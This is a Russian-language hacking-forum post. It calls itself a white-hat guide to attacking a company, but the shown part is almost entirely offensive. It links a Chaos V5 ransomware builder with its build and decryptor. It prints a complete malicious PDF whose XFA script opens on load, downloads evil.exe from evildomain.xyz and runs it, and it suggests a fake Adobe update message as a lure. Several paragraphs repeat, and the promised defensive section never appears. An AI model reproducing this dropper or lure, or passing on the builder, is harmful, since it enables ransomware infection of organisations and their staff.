Здравствуйте!
На момент выхода данной темы я уже починил свой ноутбук.
На данный момент у меня некоторые проблемы с учёбой. Появлятся на форуме будет намного проблематичнее и всяко-тако.
В данной теме мы рассмотрим двое сценариев атаки на компанию.
1. Email фишинг.
2. Использование уязвимостей.
В первом сценарии будем рассматривать способ атаки, когда в .pdf файл добавляют вредоносное вложение, после чего отправляют в отдел кадров/Тех поддержку и т.д.
Во втором же, рассмотрим вариант того, что IP одной из машин в локалке компании была засвечена в каком-нибудь шодане или ценсусе. Злой хакер-ломакер нашёл уязвимость и успешно проникнул в локальную сеть.
Также будем обозревать способы противостояния этим двоим атакам, системам мониторинга и т.п. Вите хат всё-таки.
На момент выхода данной темы я уже починил свой ноутбук.
На данный момент у меня некоторые проблемы с учёбой. Появлятся на форуме будет намного проблематичнее и всяко-тако.
В данной теме мы рассмотрим двое сценариев атаки на компанию.
1. Email фишинг.
2. Использование уязвимостей.
В первом сценарии будем рассматривать способ атаки, когда в .pdf файл добавляют вредоносное вложение, после чего отправляют в отдел кадров/Тех поддержку и т.д.
Во втором же, рассмотрим вариант того, что IP одной из машин в локалке компании была засвечена в каком-нибудь шодане или ценсусе. Злой хакер-ломакер нашёл уязвимость и успешно проникнул в локальную сеть.
Также будем обозревать способы противостояния этим двоим атакам, системам мониторинга и т.п. Вите хат всё-таки.
Что нам нужно для ransomware атаки?
Много. А ещё саму эту ransomware.
Строка 70-ят, как вы можете увидеть, открывает прямую ссыль на локер, строка 71 же его запускает.
Таким образом, при открытии pdf-файла будет загружатся и запускатся локер. А прикрыть это можно тем, что якобы "файл был создан в версии Adobe Acrobat выше вашей. Разрешите автоматическое обновление ПО для просмотра."
Много. А ещё саму эту ransomware.
Для начала это, на xss'e нашёл один интересный ransomware-builder, Chaos V5.
Файл прикрепил. За вшитые бяки не отвечаю! Всё тестить на виртуальной железке или вообще не тестить.
Настройки (Прежде всего, тема про защиту от атак а не их организацию. За все противозаконные деяния ответственность несёте вы сами!)
Сам билд. Без крипта и т.д.
Декриптор.
Файл прикрепил. За вшитые бяки не отвечаю! Всё тестить на виртуальной железке или вообще не тестить.
Настройки (Прежде всего, тема про защиту от атак а не их организацию. За все противозаконные деяния ответственность несёте вы сами!)
Сам билд. Без крипта и т.д.
Декриптор.
Код:
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/AcroForm <<
/Fields [<<
/T (0)
/Kids [<<
/Subtype /Widget
/Rect []
/T ()
/FT /Btn
>>]
>>]
/XFA 5 0 R
>>
>>
endobj
2 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 3 0 R ]
>>
endobj
3 0 obj
<<
/Type /Page
/Contents 4 0 R
/Parent 2 0 R
/Resources <<
/Font <<
/F1 <<
/Type /Font
/Subtype /Type1
/BaseFont /Arial
>>
>>
>>
>>
endobj
4 0 obj
<< /Length 47>>
stream
BT
/F1 100
Tf 1 1 1 1 1 0
Tr(Hello World!)Tj
ET
endstream
endobj
5 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config>
<template>
<subform name="_">
<pageSet/>
<field id="Hello World!">
<event activity="docReady" ref="$host">
<script>
xfa.host.gotoURL("http://evildomain.xyz/download/evil.exe");
xfa.host.gotoURL("file:///C:/Users/%USERNAME%/Downloads/evil.exe");
</script>
</event>
</field>
</subform>
</template>
</xdp:xdp>
endstream
endobj
trailer
<<
/Root 1 0 R
>>
%%EOF
Строка 70-ят, как вы можете увидеть, открывает прямую ссыль на локер, строка 71 же его запускает.
Таким образом, при открытии pdf-файла будет загружатся и запускатся локер. А прикрыть это можно тем, что якобы "файл был создан в версии Adobe Acrobat выше вашей. Разрешите автоматическое обновление ПО для просмотра."
(Это - небольшой кусок того, что я хотел сделать. Однако, ситуация с тем, что все черновики которые я сохраняю куда-то исчезают, заставляет меня продолжить тему под данным постом.)
Вложения
Последнее редактирование: